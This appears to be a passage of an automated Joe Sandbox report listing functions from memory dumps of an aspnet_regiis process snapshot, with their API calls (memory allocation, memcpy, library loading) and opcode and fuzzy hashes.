                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footer
                                                                                                                            • String ID: Infinity$NaN
                                                                                                                            • API String ID: 1385522511-4285296124
                                                                                                                            • Opcode ID: 58b6acdd02f33794e3ea3a495eebb2c7f8231127fb0d5c9f4d65b092dd19d72f
                                                                                                                            • Instruction ID: 288bf644ef2a1c2f714679b1ce1e0315099f85b131182214f7260d56b7874cb2
                                                                                                                            • Opcode Fuzzy Hash: 58b6acdd02f33794e3ea3a495eebb2c7f8231127fb0d5c9f4d65b092dd19d72f
                                                                                                                            • Instruction Fuzzy Hash: 5CF0AF70E00642CEDB128FD8F84D7583771B343309F200A99C5044BB80F7B56566CBDA
                                                                                                                            Function 6CC3BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CC3BEE3
                                                                                                                            • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CC3BEF5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$CallsDisableLoadThread
                                                                                                                            • String ID: cryptbase.dll
                                                                                                                            • API String ID: 4137859361-1262567842
                                                                                                                            • Opcode ID: 4ff60d3c649094d417f7ecd78889216dc676ba46fd17c864a4a9188957a2ac95
                                                                                                                            • Instruction ID: c9f5ddb16f758e9180140072239c5a9686cb935de259f9f0161a115c627abbae
                                                                                                                            • Opcode Fuzzy Hash: 4ff60d3c649094d417f7ecd78889216dc676ba46fd17c864a4a9188957a2ac95
                                                                                                                            • Instruction Fuzzy Hash: 47D023311C050CEBCB00ABD4AC1DF1D3BB4A701315F10C020F309448D1D7B09410CF40
                                                                                                                            Function 6CC7B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CC7B2C9,?,?,?,6CC7B127,?,?,?,?,?,?,?,?,?,6CC7AE52), ref: 6CC7B628
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC790FF
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC79108
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC7B2C9,?,?,?,6CC7B127,?,?,?,?,?,?,?,?,?,6CC7AE52), ref: 6CC7B67D
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC7B2C9,?,?,?,6CC7B127,?,?,?,?,?,?,?,?,?,6CC7AE52), ref: 6CC7B708
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CC7B127,?,?,?,?,?,?,?,?), ref: 6CC7B74D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: 189bf74d22a58b278517e3152a36dedd196e3716c08d42510cc73d63494d5984
                                                                                                                            • Instruction ID: acea6b9bfef3567657899d8649a53e549c108e513fa42fbcd6717c9e041d69ca
                                                                                                                            • Opcode Fuzzy Hash: 189bf74d22a58b278517e3152a36dedd196e3716c08d42510cc73d63494d5984
                                                                                                                            • Instruction Fuzzy Hash: 5151DDB1A012168FDB28CF59C9A466EB7B5FF85304F05852DC95AAB700EB35E804CBB1
                                                                                                                            Function 6CC7DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC6FF2A), ref: 6CC7DFFD
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC790FF
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC79108
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC6FF2A), ref: 6CC7E04A
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC6FF2A), ref: 6CC7E0C0
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC6FF2A), ref: 6CC7E0FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: 1cbee891c52d9521a0601a02e2b4d1c56952145cde61a4fc1b4c06168c2b7965
                                                                                                                            • Instruction ID: 9f1295f126d8b1ef2fc0168fba0895b94b38f126ffede7f5bd229ce576af16f0
                                                                                                                            • Opcode Fuzzy Hash: 1cbee891c52d9521a0601a02e2b4d1c56952145cde61a4fc1b4c06168c2b7965
                                                                                                                            • Instruction Fuzzy Hash: AA41C1B26042168FEB24CF68D88479A77B6FB45308F15493DD516DB740F732E906CBA2
                                                                                                                            Function 6CC76E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CC76EAB
                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CC76EFA
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC76F1E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC76F5C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$freememcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4259248891-0
                                                                                                                            • Opcode ID: 2071e7a558352ed4e520d07a4233f110b68b2497ebf4958a90a874c3c15736aa
                                                                                                                            • Instruction ID: 183720d87ffc2dbb74159c3f86d213a63ba90c266233887a851755ea9579f9d3
                                                                                                                            • Opcode Fuzzy Hash: 2071e7a558352ed4e520d07a4233f110b68b2497ebf4958a90a874c3c15736aa
                                                                                                                            • Instruction Fuzzy Hash: DC31D071A10A0A8FDB14CF2DDD806AA73E9FB85344F50823AD41AD7651FB31E65987A0
                                                                                                                            Function 6CC8B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B5EA
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B623
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B66C
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B67F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1480856625-0
                                                                                                                            • Opcode ID: 6fadccd2c67165af8b65dd57c8cb09cfe5ef6363ebda482183cf135d73b5a71d
                                                                                                                            • Instruction ID: 94eecc6342697774b7a527be0f629d2a94e84eef174d6ab38dac35e2de2cccea
                                                                                                                            • Opcode Fuzzy Hash: 6fadccd2c67165af8b65dd57c8cb09cfe5ef6363ebda482183cf135d73b5a71d
                                                                                                                            • Instruction Fuzzy Hash: F831D4B1A022168FDB14CF59CC5465FBBF5FF81318F16866AC8069B205EB31E915CBA1
                                                                                                                            Function 6CC5F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC5F611
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC5F623
                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC5F652
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC5F668
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3510742995-0
                                                                                                                            • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                            • Instruction ID: 306d3753d34c8ae10e48c860b3e1203b7e53435f46a433c5ea2cba9e1294e92e
                                                                                                                            • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                            • Instruction Fuzzy Hash: 21315371A002149FC718CF5DCCC0A9F77B5FF84354B548539FA4A8BB08E671E9648B94
                                                                                                                            Function 6CC726B0 Relevance: 5.0, APIs: 4, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1294909896-0
                                                                                                                            • Opcode ID: e211fa768c3878941b5a250a413acd842b0d94cd5e72de437bafa98071597ee6
                                                                                                                            • Instruction ID: 3d2c76223ff4c2395d248baa454785bc35ab1e07ec6f7885cd3a42e98f5237bb
                                                                                                                            • Opcode Fuzzy Hash: e211fa768c3878941b5a250a413acd842b0d94cd5e72de437bafa98071597ee6
                                                                                                                            • Instruction Fuzzy Hash: DEF0F9B27012049BE7209A58E888D4BB3ADEF41358B504036EA16C3B01F332F919C6B1